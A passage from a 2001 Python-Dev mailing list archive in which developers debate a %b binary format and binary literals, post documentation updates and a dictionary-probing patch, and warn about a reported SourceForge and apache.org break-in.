Unfortunately, significant effort takes significant time too, and nobody has
started on this yet.


From mal@lemburg.com  Wed May 30 22:31:06 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Wed, 30 May 2001 23:31:06 +0200
Subject: [Python-Dev] %b format?
References: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com> <20010530172838.A778@thyrsus.com>
Message-ID: <3B15669A.43B70A44@lemburg.com>

"Eric S. Raymond" wrote:
> 
> Greg Wilson <Greg.Wilson@baltimore.com>:
> > I would like to add a "%b" format for converting
> > numbers to binary format (1's and 0's).  I realize
> > this isn't a C-ism, but it would be very useful for
> > teaching purposes, as newcomers find 101101 a lot
> > easier to understand than 0x2D.
> >
> > Reactions?
> 
> +1.  Didactically pretty useful, and the additional code won't boost
> global complexity much.

Good idea. The only question I have is: in which order will
you print the 0s and 1s (MSB->LSB, LSB->MSB, little/big endian) ?

I am thinking of adding a bit field type to mxNumber and have
the same problem there...

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From esr@thyrsus.com  Wed May 30 22:42:22 2001
From: esr@thyrsus.com (Eric S. Raymond)
Date: Wed, 30 May 2001 17:42:22 -0400
Subject: [Python-Dev] Re: [Patches] [ python-Patches-428326 ] Timer class for threading
In-Reply-To: <LNBBLJKPBEHFEDALKOLCGEHDKFAA.tim.one@home.com>; from tim.one@home.com on Wed, May 30, 2001 at 05:30:49PM -0400
References: <20010530131424.Y690@xs4all.nl> <LNBBLJKPBEHFEDALKOLCGEHDKFAA.tim.one@home.com>
Message-ID: <20010530174222.A1019@thyrsus.com>

Tim Peters <tim.one@home.com>:
> My position will be that nothing ships in the distribution unless copyright
> has been assigned to the PSF, or the contributor has agreed to give the PSF
> a non-exclusive irrevocable etc license to release their work under the PSF
> license du jour.  Fleshing out the second option so as to prevent abuse on
> either side is going to require significant effort ("what if the PSF goes
> away?", "what if the PSF changes its license to something I hate?", "what if
> I change my mind?", etc).
> 
> Unfortunately, significant effort takes significant time too, and nobody has
> started on this yet.

I think a PSF pleadge to use only an OSI-certified license would address
some of these issues.  Write it into the bylaws if necessary.
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

He that would make his own liberty secure must guard even his enemy from
oppression: for if he violates this duty, he establishes a precedent that
will reach unto himself.
	-- Thomas Paine


From esr@thyrsus.com  Wed May 30 22:44:57 2001
From: esr@thyrsus.com (Eric S. Raymond)
Date: Wed, 30 May 2001 17:44:57 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <3B15669A.43B70A44@lemburg.com>; from mal@lemburg.com on Wed, May 30, 2001 at 11:31:06PM +0200
References: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com> <20010530172838.A778@thyrsus.com> <3B15669A.43B70A44@lemburg.com>
Message-ID: <20010530174457.B1019@thyrsus.com>

M.-A. Lemburg <mal@lemburg.com>:
> > > I would like to add a "%b" format for converting
> > > numbers to binary format (1's and 0's).  I realize
> > > this isn't a C-ism, but it would be very useful for
> > > teaching purposes, as newcomers find 101101 a lot
> > > easier to understand than 0x2D.
> > 
> > +1.  Didactically pretty useful, and the additional code won't boost
> > global complexity much.
> 
> Good idea. The only question I have is: in which order will
> you print the 0s and 1s (MSB->LSB, LSB->MSB, little/big endian) ?
> 
> I am thinking of adding a bit field type to mxNumber and have
> the same problem there...

For *this* context, we clearly want mathematical notation; MSB to the right
and no byte-swapping.  After all we'd actually be printing numerals, not 
dumping a bitfield.
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

The people of the various provinces are strictly forbidden to have in their
possession any swords, short swords, bows, spears, firearms, or other types
of arms. The possession of unnecessary implements makes difficult the
collection of taxes and dues and tends to foment uprisings.
        -- Toyotomi Hideyoshi, dictator of Japan, August 1588


From barry@digicool.com  Wed May 30 22:49:22 2001
From: barry@digicool.com (Barry A. Warsaw)
Date: Wed, 30 May 2001 17:49:22 -0400
Subject: [Python-Dev] %b format?
References: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com>
Message-ID: <15125.27362.431144.886216@anthem.wooz.org>

>>>>> "GW" == Greg Wilson <Greg.Wilson@baltimore.com> writes:

    GW> I would like to add a "%b" format for converting numbers to
    GW> binary format (1's and 0's).

For completeness, wouldn't you also want a binary integer literal so
your students could write binary numbers in their code?  And what
about a binary() operator a la hex()?

-Barry


From tim.one@home.com  Wed May 30 22:50:31 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 30 May 2001 17:50:31 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <3B15669A.43B70A44@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEHFKFAA.tim.one@home.com>

[Greg Wilson]
> I would like to add a "%b" format for converting
> numbers to binary format (1's and 0's).

-0, due to compound lumpiness:  hex() is to %x is to __hex__ as oct() is to
%o is to __oct__ as nothing is to %b is to nothing.  In that respect it's
unfortunate that Python has distinct nb_oct and nb_hex slots in the
PyNumberMethods struct (as opposed to a single parameterized "convert to
base N string" method).

[MAL]
> Good idea. The only question I have is: in which order will
> you print the 0s and 1s (MSB->LSB, LSB->MSB, little/big endian) ?

I'm sure Greg has in mind only integers, in which case %x and %o already
give the only useful <wink> answer.


From fdrake@cj42289-a.reston1.va.home.com  Wed May 30 22:51:22 2001
From: fdrake@cj42289-a.reston1.va.home.com (Fred Drake)
Date: Wed, 30 May 2001 17:51:22 -0400 (EDT)
Subject: [Python-Dev] [development doc updates]
Message-ID: <20010530215122.3738C28849@cj42289-a.reston1.va.home.com>

The development version of the documentation has been updated:

    http://python.sourceforge.net/devel-docs/

Update for development version of Python (2.2).

This update substantially re-works the prototype support for
productions of a formal grammar.  They look better, support forward
references to symbol definitions, and allow download of an all-text
version of the complete grammar (with productions ordered the same way
as they are in the documentation sources).

"Documeting Python" now includes documentation for the LaTeX markup
used to describe productions:

    http://python.sourceforge.net/devel-docs/doc/grammar-displays.html


From esr@thyrsus.com  Wed May 30 23:05:09 2001
From: esr@thyrsus.com (Eric S. Raymond)
Date: Wed, 30 May 2001 18:05:09 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <LNBBLJKPBEHFEDALKOLCGEHFKFAA.tim.one@home.com>; from tim.one@home.com on Wed, May 30, 2001 at 05:50:31PM -0400
References: <3B15669A.43B70A44@lemburg.com> <LNBBLJKPBEHFEDALKOLCGEHFKFAA.tim.one@home.com>
Message-ID: <20010530180509.B1305@thyrsus.com>

Tim Peters <tim.one@home.com>:
> -0, due to compound lumpiness:  hex() is to %x is to __hex__ as oct() is to
> %o is to __oct__ as nothing is to %b is to nothing.  In that respect it's
> unfortunate that Python has distinct nb_oct and nb_hex slots in the
> PyNumberMethods struct (as opposed to a single parameterized "convert to
> base N string" method).

Is the right answer to add the convert-to-base slot and deprecate the
other two?
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

If gun laws in fact worked, the sponsors of this type of legislation
should have no difficulty drawing upon long lists of examples of
criminal acts reduced by such legislation. That they cannot do so
after a century and a half of trying -- that they must sweep under the
rug the southern attempts at gun control in the 1870-1910 period, the
northeastern attempts in the 1920-1939 period, the attempts at both
Federal and State levels in 1965-1976 -- establishes the repeated,
complete and inevitable failure of gun laws to control serious crime.
        -- Senator Orrin Hatch, in a 1982 Senate Report


From fdrake@acm.org  Wed May 30 23:00:15 2001
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Wed, 30 May 2001 18:00:15 -0400 (EDT)
Subject: [Python-Dev] Most recent documentation update
Message-ID: <15125.28015.611763.968854@cj42289-a.reston1.va.home.com>

  One thing I forgot to mention in my announcement of the update to
the development documnetation which I just posted is that I went ahead
and converted all but one of the productions in the Reference Manual
to the new markup.  The print_stmt production, unfortunately, is given
twice instead of using a single model for the statement.  The
formatting tools don't support that (yet), and it's not clear that
they should.
  (No, Barry, don't go changing it...!)


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From esr@thyrsus.com  Wed May 30 23:03:41 2001
From: esr@thyrsus.com (Eric S. Raymond)
Date: Wed, 30 May 2001 18:03:41 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <15125.27362.431144.886216@anthem.wooz.org>; from barry@digicool.com on Wed, May 30, 2001 at 05:49:22PM -0400
References: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com> <15125.27362.431144.886216@anthem.wooz.org>
Message-ID: <20010530180341.A1305@thyrsus.com>

Barry A. Warsaw <barry@digicool.com>:
> 
> >>>>> "GW" == Greg Wilson <Greg.Wilson@baltimore.com> writes:
> 
>     GW> I would like to add a "%b" format for converting numbers to
>     GW> binary format (1's and 0's).
> 
> For completeness, wouldn't you also want a binary integer literal so
> your students could write binary numbers in their code?  And what
> about a binary() operator a la hex()?

Barry is correct.  If we're going to do this, we ought to do it right and
support binary on a par with decimal, hex, and octal.  I favor this.
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

The direct use of physical force is so poor a solution to the problem of
limited resources that it is commonly employed only by small children and
great nations.
	-- David Friedman


From barry@digicool.com  Wed May 30 23:05:37 2001
From: barry@digicool.com (Barry A. Warsaw)
Date: Wed, 30 May 2001 18:05:37 -0400
Subject: [Python-Dev] Most recent documentation update
References: <15125.28015.611763.968854@cj42289-a.reston1.va.home.com>
Message-ID: <15125.28337.938136.505675@anthem.wooz.org>

>>>>> "Fred" == Fred L Drake, Jr <fdrake@acm.org> writes:

    Fred> (No, Barry, don't go changing it...!)

Oh darn, three whole days work wasted...

:)


From tim.one@home.com  Wed May 30 23:17:42 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 30 May 2001 18:17:42 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <15125.27362.431144.886216@anthem.wooz.org>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEHIKFAA.tim.one@home.com>

Note that in Vyper (John Skaller's Python variant) these are legit integer
literals:

0b11111111 0B11111111
0o777      0O777
0d999      0D999
0xfFf      0XFFf

Vyper's octal notation is still ugly, but whoever first thought

    0777 != 777

was a "good idea" was certifiably insane <0.25 wink>.


From tim.one@home.com  Wed May 30 23:29:33 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 30 May 2001 18:29:33 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <20010530180509.B1305@thyrsus.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEHJKFAA.tim.one@home.com>

[Eric S. Raymond]
> Is the right answer to add the convert-to-base slot and deprecate the
> other two?

That would fix "the other" lump here in Python, that e.g.

>>> int("111", 3)
13
>>>

has no inverse.  string->int is happy with any base in 2..36 inclusive, but
int->string is spelled via 3 different builtins covering only 3 of those
bases.

It would be more *expedient* to add "just" a __bin__/nb_bin method + a way
to spell binary int literals + a %b format + a bin() builtin.

On the fifth hand, I doubt anyone would want to add new % format codes for
bases {2..36} - {2, 8, 10, 16}.

So it will remain lumpy no matter what.  I look forward to the PEP <wink>.


From esr@thyrsus.com  Wed May 30 23:38:33 2001
From: esr@thyrsus.com (Eric S. Raymond)
Date: Wed, 30 May 2001 18:38:33 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEHIKFAA.tim.one@home.com>; from tim.one@home.com on Wed, May 30, 2001 at 06:17:42PM -0400
References: <15125.27362.431144.886216@anthem.wooz.org> <LNBBLJKPBEHFEDALKOLCKEHIKFAA.tim.one@home.com>
Message-ID: <20010530183833.B1654@thyrsus.com>

Tim Peters <tim.one@home.com>:
> Vyper's octal notation is still ugly, but whoever first thought
> 
>     0777 != 777
> 
> was a "good idea" was certifiably insane <0.25 wink>.

For anyone who doesn't know the history behind this...  

The 0xxx notation was copied from PDP-11 assembler literals -- the
instruction-set design of the PDP-11 was such that most of the
instruction subfields fit in octal digits, so this convention made it
somewhat easier to read machine-code dumps.

While I'm at it, I should note that the design of the 11 was ancestral
to both the 8088 and 68000 microprocessors, and thus to essentially 
every new general-purpose computer designed in the last fifteen years.
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

"Are we to understand," asked the judge, "that you hold your own interests
above the interests of the public?"

"I hold that such a question can never arise except in a society of cannibals."
	-- Ayn Rand


From esr@thyrsus.com  Wed May 30 23:39:43 2001
From: esr@thyrsus.com (Eric S. Raymond)
Date: Wed, 30 May 2001 18:39:43 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <LNBBLJKPBEHFEDALKOLCIEHJKFAA.tim.one@home.com>; from tim.one@home.com on Wed, May 30, 2001 at 06:29:33PM -0400
References: <20010530180509.B1305@thyrsus.com> <LNBBLJKPBEHFEDALKOLCIEHJKFAA.tim.one@home.com>
Message-ID: <20010530183943.C1654@thyrsus.com>

Tim Peters <tim.one@home.com>:
> [Eric S. Raymond]
> > Is the right answer to add the convert-to-base slot and deprecate the
> > other two?
> 
> That would fix "the other" lump here in Python, that e.g.
> 
> >>> int("111", 3)
> 13
> >>>
> 
> has no inverse.  string->int is happy with any base in 2..36 inclusive, but
> int->string is spelled via 3 different builtins covering only 3 of those
> bases.

That sounds like a strong argument to me.  
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

The world is filled with violence. Because criminals carry guns, we
decent law-abiding citizens should also have guns. Otherwise they will
win and the decent people will lose.
        -- James Earl Jones


From nas@python.ca  Wed May 30 23:38:58 2001
From: nas@python.ca (Neil Schemenauer)
Date: Wed, 30 May 2001 15:38:58 -0700
Subject: [Python-Dev] %b format?
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEHIKFAA.tim.one@home.com>; from tim.one@home.com on Wed, May 30, 2001 at 06:17:42PM -0400
References: <15125.27362.431144.886216@anthem.wooz.org> <LNBBLJKPBEHFEDALKOLCKEHIKFAA.tim.one@home.com>
Message-ID: <20010530153858.A21901@glacier.fnational.com>

Tim Peters wrote:
> Vyper's octal notation is still ugly, but whoever first thought
> 
>     0777 != 777
> 
> was a "good idea" was certifiably insane <0.25 wink>.

Ever used MacLisp or ZetaLisp?  There:

    777 == 0d511

If only we had been born with 8 or 16 fingers, right?

  Neil


From thomas@xs4all.net  Thu May 31 02:52:48 2001
From: thomas@xs4all.net (Thomas Wouters)
Date: Thu, 31 May 2001 03:52:48 +0200
Subject: [Python-Dev] SF hacked
Message-ID: <20010531035248.G690@xs4all.nl>

It *seems*, from this site:

http://66.92.75.28/~vladimir/themes-org.html

that SourceForge has been hacked, and more seriously than SF first admits
(if I'm to believe the arrogant sprouting of some script-kiddie, anyway. :)
And the same goes for apache.org, it looks like. Anyway, if anyone connected
*from* any of sourceforge's machines to anywhere else, in the last couple of
months, they'll be well advised to change their passwords and check for
intruders. The same goes if you connect through ssh and (foolishly ;)
allowed ssh-agent-forwarding to the SF machines. In that case, better check
all the machines that ssh-agent would give you unpassworded access to for
logins you don't recognize. The site above lists a number of sniffed
passwords, in case you want to check, but there's no reason for the hacker
not to have even more sniffed passwords lying about :)

And if you have a login on apache.org, you probably want to change your
password in any case.... the above listed site has what seems to be a copy
of the shadow password file.

-- 
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From tim.one@home.com  Thu May 31 04:53:53 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 30 May 2001 23:53:53 -0400
Subject: [Python-Dev] One more dict trick
Message-ID: <LNBBLJKPBEHFEDALKOLCGEIFKFAA.tim.one@home.com>

This is a multi-part message in MIME format.

------=_NextPart_000_0006_01C0E963.C83DC7A0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

If anyone has an app known or suspected to be sensitive to dict timing,
please try the patch here.  Best I've been able to tell, it's a win.  But
it's a radical change in approach, so I don't want to rush it.

This gets rid of the polynomial machinery entirely, along with the branches
associated with updating the things, and the dictobject struct member
holding the table's poly.  Instead it relies on that

    i = (5*i + 1) % n

is a full-period RNG whenever n is a power of 2 (that's what guarantees it
will visit every slot), but perturbs that by adding in a few bits from the
full hash code shifted right each time (that's what guarantees every bit of
the hash code eventually influences the probe sequence, avoiding simple
quadratic-time degenerate cases).

------=_NextPart_000_0006_01C0E963.C83DC7A0
Content-Type: text/plain;
	name="dict.txt"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
	filename="dict.txt"

Index: Objects/dictobject.c
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
RCS file: /cvsroot/python/python/dist/src/Objects/dictobject.c,v
retrieving revision 2.96
diff -c -r2.96 dictobject.c
*** Objects/dictobject.c	2001/05/27 07:39:22	2.96
--- Objects/dictobject.c	2001/05/31 03:29:23
***************
*** 85,123 ****
  iteration.
  */
 =20
- static long polys[] =3D {
- /*	4 + 3, */	/* first active entry if MINSIZE =3D=3D 4 */
- 	8 + 3,		/* first active entry if MINSIZE =3D=3D 8 */
- 	16 + 3,
- 	32 + 5,
- 	64 + 3,
- 	128 + 3,
- 	256 + 29,
- 	512 + 17,
- 	1024 + 9,
- 	2048 + 5,
- 	4096 + 83,
- 	8192 + 27,
- 	16384 + 43,
- 	32768 + 3,
- 	65536 + 45,
- 	131072 + 9,
- 	262144 + 39,
- 	524288 + 39,
- 	1048576 + 9,
- 	2097152 + 5,
- 	4194304 + 3,
- 	8388608 + 33,
- 	16777216 + 27,
- 	33554432 + 9,
- 	67108864 + 71,
- 	134217728 + 39,
- 	268435456 + 9,
- 	536870912 + 5,
- 	1073741824 + 83
- 	/* 2147483648 + 9 -- if we ever boost this to unsigned long */
- };
-=20
  /* Object used as dummy key to fill deleted entries */
  static PyObject *dummy; /* Initialized by first call to =
newdictobject() */
 =20
--- 85,90 ----
***************
*** 168,174 ****
  	int ma_fill;  /* # Active + # Dummy */
  	int ma_used;  /* # Active */
  	int ma_size;  /* total # slots in ma_table */
- 	int ma_poly;  /* appopriate entry from polys vector */
  	/* ma_table points to ma_smalltable for small tables, else to
  	 * additional malloc'ed memory.  ma_table is never NULL!  This rule
  	 * saves repeated runtime null-tests in the workhorse getitem and
--- 135,140 ----
***************
*** 202,209 ****
  	(mp)->ma_table =3D (mp)->ma_smalltable;				\
  	(mp)->ma_size =3D MINSIZE;					\
  	(mp)->ma_used =3D (mp)->ma_fill =3D 0;				\
- 	(mp)->ma_poly =3D polys[0];					\
- 	assert(MINSIZE < (mp)->ma_poly && (mp)->ma_poly < MINSIZE*2);	\
      } while(0)
 =20
  PyObject *
--- 168,173 ----
***************
*** 252,257 ****
--- 216,240 ----
  a dictentry* for which the me_value field is NULL.  Exceptions are =
never
  reported by this function, and outstanding exceptions are maintained.
  */
+=20
+ /* #define DUMP_HASH_STUFF */
+ #ifdef DUMP_HASH_STUFF
+ static int nEntry =3D 0, nCollide =3D 0, nTrip =3D 0;
+ #define BUMP_ENTRY ++nEntry
+ #define BUMP_COLLIDE ++nCollide
+ #define BUMP_TRIP ++nTrip
+ #define PRINT_HASH_STUFF \
+ 	if ((nEntry & 0x1ff) =3D=3D 0) \
+ 		fprintf(stderr, "%d %d %d\n", nEntry, nCollide, nTrip)
+=20
+ #else
+ #define BUMP_ENTRY
+ #define BUMP_COLLIDE
+ #define BUMP_TRIP
+ #define PRINT_HASH_STUFF
+ #endif
+=20
+=20
  static dictentry *
  lookdict(dictobject *mp, PyObject *key, register long hash)
  {
***************
*** 265,270 ****
--- 248,254 ----
  	register int checked_error =3D 0;
  	register int cmp;
  	PyObject *err_type, *err_value, *err_tb;
+ 	BUMP_ENTRY;
  	/* We must come up with (i, incr) such that 0 <=3D i < ma_size
  	   and 0 < incr < ma_size and both are a function of hash.
  	   i is the initial table index and incr the initial probe offset. */
***************
*** 294,309 ****
  		}
  		freeslot =3D NULL;
  	}
! 	/* Derive incr from hash, just to make it more arbitrary. Note that
! 	   incr must not be 0, or we will get into an infinite loop.*/
! 	incr =3D hash ^ ((unsigned long)hash >> 3);
!=20
  	/* In the loop, me_key =3D=3D dummy is by far (factor of 100s) the
  	   least likely outcome, so test for that last. */
  	for (;;) {
! 		if (!incr)
! 			incr =3D 1; /* and incr will never be 0 again */
! 		ep =3D &ep0[(i + incr) & mask];
  		if (ep->me_key =3D=3D NULL) {
  			if (restore_error)
  				PyErr_Restore(err_type, err_value, err_tb);
--- 278,292 ----
  		}
  		freeslot =3D NULL;
  	}
! 	incr =3D hash;
! 	BUMP_COLLIDE;
  	/* In the loop, me_key =3D=3D dummy is by far (factor of 100s) the
  	   least likely outcome, so test for that last. */
  	for (;;) {
! 		BUMP_TRIP;
! 		i =3D (i << 2) + i + (incr & 0xf) + 1;
! 		incr >>=3D 4;
! 		ep =3D &ep0[i & mask];
  		if (ep->me_key =3D=3D NULL) {
  			if (restore_error)
  				PyErr_Restore(err_type, err_value, err_tb);
***************
*** 335,344 ****
  		}
  		else if (ep->me_key =3D=3D dummy && freeslot =3D=3D NULL)
  			freeslot =3D ep;
- 		/* Cycle through GF(2**n). */
- 		if (incr & 1)
- 			incr ^=3D mp->ma_poly; /* clears the lowest bit */
- 		incr >>=3D 1;
  	}
  }
 =20
--- 318,323 ----
***************
*** 370,375 ****
--- 349,356 ----
  		mp->ma_lookup =3D lookdict;
  		return lookdict(mp, key, hash);
  	}
+ 	BUMP_ENTRY;
+ 	PRINT_HASH_STUFF;
  	/* We must come up with (i, incr) such that 0 <=3D i < ma_size
  	   and 0 < incr < ma_size and both are a function of hash */
  	i =3D hash & mask;
***************
*** 387,400 ****
  	}
  	/* Derive incr from hash, just to make it more arbitrary. Note that
  	   incr must not be 0, or we will get into an infinite loop.*/
! 	incr =3D hash ^ ((unsigned long)hash >> 3);
!=20
  	/* In the loop, me_key =3D=3D dummy is by far (factor of 100s) the
  	   least likely outcome, so test for that last. */
  	for (;;) {
! 		if (!incr)
! 			incr =3D 1; /* and incr will never be 0 again */
! 		ep =3D &ep0[(i + incr) & mask];
  		if (ep->me_key =3D=3D NULL)
  			return freeslot =3D=3D NULL ? ep : freeslot;
  		if (ep->me_key =3D=3D key
--- 368,382 ----
  	}
  	/* Derive incr from hash, just to make it more arbitrary. Note that
  	   incr must not be 0, or we will get into an infinite loop.*/
! 	incr =3D hash;
! 	BUMP_COLLIDE;
  	/* In the loop, me_key =3D=3D dummy is by far (factor of 100s) the
  	   least likely outcome, so test for that last. */
  	for (;;) {
! 		BUMP_TRIP;
! 		i =3D (i << 2) + i + (incr & 0xf) + 1;
! 		incr >>=3D 4;
! 		ep =3D &ep0[i  & mask];
  		if (ep->me_key =3D=3D NULL)
  			return freeslot =3D=3D NULL ? ep : freeslot;
  		if (ep->me_key =3D=3D key
***************
*** 404,413 ****
  			return ep;
  		if (ep->me_key =3D=3D dummy && freeslot =3D=3D NULL)
  			freeslot =3D ep;
- 		/* Cycle through GF(2**n). */
- 		if (incr & 1)
- 			incr ^=3D mp->ma_poly; /* clears the lowest bit */
- 		incr >>=3D 1;
  	}
  }
 =20
--- 386,391 ----
***************
*** 448,454 ****
  static int
  dictresize(dictobject *mp, int minused)
  {
! 	int newsize, newpoly;
  	dictentry *oldtable, *newtable, *ep;
  	int i;
  	int is_oldtable_malloced;
--- 426,432 ----
  static int
  dictresize(dictobject *mp, int minused)
  {
! 	int newsize;
  	dictentry *oldtable, *newtable, *ep;
  	int i;
  	int is_oldtable_malloced;
***************
*** 456,475 ****
 =20
  	assert(minused >=3D 0);
 =20
! 	/* Find the smallest table size > minused, and its poly[] entry. */
! 	newpoly =3D 0;
! 	newsize =3D MINSIZE;
! 	for (i =3D 0; i < sizeof(polys)/sizeof(polys[0]); ++i) {
! 		if (newsize > minused) {
! 			newpoly =3D polys[i];
! 			break;
! 		}
! 		newsize <<=3D 1;
! 		if (newsize < 0)   /* overflow */
! 			break;
! 	}
! 	if (newpoly =3D=3D 0) {
! 		/* Ran out of polynomials or newsize overflowed. */
  		PyErr_NoMemory();
  		return -1;
  	}
--- 434,445 ----
 =20
  	assert(minused >=3D 0);
 =20
! 	/* Find the smallest table size > minused. */
! 	for (newsize =3D MINSIZE;
! 	     newsize <=3D minused && newsize >=3D 0;
! 	     newsize <<=3D 1)
! 		;
! 	if (newsize < 0) {
  		PyErr_NoMemory();
  		return -1;
  	}
***************
*** 511,517 ****
  	mp->ma_table =3D newtable;
  	mp->ma_size =3D newsize;
  	memset(newtable, 0, sizeof(dictentry) * newsize);
- 	mp->ma_poly =3D newpoly;
  	mp->ma_used =3D 0;
  	i =3D mp->ma_fill;
  	mp->ma_fill =3D 0;
--- 481,486 ----

------=_NextPart_000_0006_01C0E963.C83DC7A0--


From tim.one@home.com  Thu May 31 05:46:56 2001
From: tim.one@home.com (Tim Peters)
Date: Thu, 31 May 2001 00:46:56 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <20010530183833.B1654@thyrsus.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEIHKFAA.tim.one@home.com>

[ESR]
> The 0xxx notation was copied from PDP-11 assembler literals -- the
> instruction-set design of the PDP-11 was such that most of the
> instruction subfields fit in octal digits, so this convention made it
> somewhat easier to read machine-code dumps.

That doesn't mean they weren't certifiably insane.  At Cray, we had a much
more sensible convention:  *all* numbers were octal (yes, it was a 64-bit
box and octal didn't make any sense, but Seymour Cray got used to it from
the 60-bit CDC w/ 18-bit address registers and didn't feel like changing).
My first boss there loved telling the story about he was out for a drive
with the family, and excitedly screamed "Hey, kids!  Look!  The odometer is
just about to change to 40,000!".  Of course it read 37,777.9 at the time,
and they thought he was nuts.  That's where this kind of thing always leads
in the end.

to-disgrace-despair-and-eventually-ruin-ly y'rs  - tim


From tim.one@home.com  Thu May 31 05:48:28 2001
From: tim.one@home.com (Tim Peters)
Date: Thu, 31 May 2001 00:48:28 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <20010530153858.A21901@glacier.fnational.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEIHKFAA.tim.one@home.com>

[Neil Schemenauer]
> Ever used MacLisp or ZetaLisp?  There:
>
>     777 == 0d511
>
> If only we had been born with 8 or 16 fingers, right?

Then guys would probably be attracted to base 9 or 17.

sorry-for-that-but-i-felt-it-was-expected-of-me-ly y'rs  - tim


From greg@cosc.canterbury.ac.nz  Thu May 31 06:15:24 2001
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 31 May 2001 17:15:24 +1200 (NZST)
Subject: [Python-Dev] scoping and list comprehensions
In-Reply-To: <15125.23727.168431.762320@beluga.mojam.com>
Message-ID: <200105310515.RAA01757@s454.cosc.canterbury.ac.nz>

Skip:

>    scope:
>        l = [i**2 for i in range(10)]

By analogy with C, the introducer of a new scope should
simply be an unadorned colon:

  :
    l = [i**2 for i in range(10)]

:-)

While this might be useful, it doesn't really address the issue
raised, because we really need a new scope per listcomp (or
maybe even each 'for' in the listcomp).

> There's also the problem of how to export results from the scope, though
> perhaps the new nested scope stuff provides a solution to that.

Nope -- there's still no way to assign to any name in
an intermediate scope. Something heretical, such as
declarations, would be needed.

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From greg@cosc.canterbury.ac.nz  Thu May 31 06:16:11 2001
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 31 May 2001 17:16:11 +1200 (NZST)
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <LNBBLJKPBEHFEDALKOLCAEGOKFAA.tim.one@home.com>
Message-ID: <200105310516.RAA01760@s454.cosc.canterbury.ac.nz>

Tim:

> >>> base3 = [x[:] for x[0] in digits for x[1] in digits for x[2] in
>              digits]

Yikes! That would be clearer as

  [[x,y,z] for x in digits for y in digits for z in digits]

I'll concede it's nowhere near as much fun, though...

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From greg@cosc.canterbury.ac.nz  Thu May 31 06:16:41 2001
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 31 May 2001 17:16:41 +1200 (NZST)
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <LNBBLJKPBEHFEDALKOLCEEGPKFAA.tim.one@home.com>
Message-ID: <200105310516.RAA01763@s454.cosc.canterbury.ac.nz>

Tim:

> Needs a PEP, and possibly
> even an associated future-statement.  Overall, I'm more in favor of changing
> it than not.

If we do this, we also need to consider whether we want
to make the corresponding change to regular for-loops.
Seems to me that all the reasons it's a good idea for
listcomps apply to for-loops as well.

Another advantage of changing both together is that
we can continue to describe listcomp semantics in terms
of for-loops instead of lambdas. Then we won't have to go 
into hiding until Guido dies or lifts the fatwah against
us.

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From greg@cosc.canterbury.ac.nz  Thu May 31 06:17:16 2001
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 31 May 2001 17:17:16 +1200 (NZST)
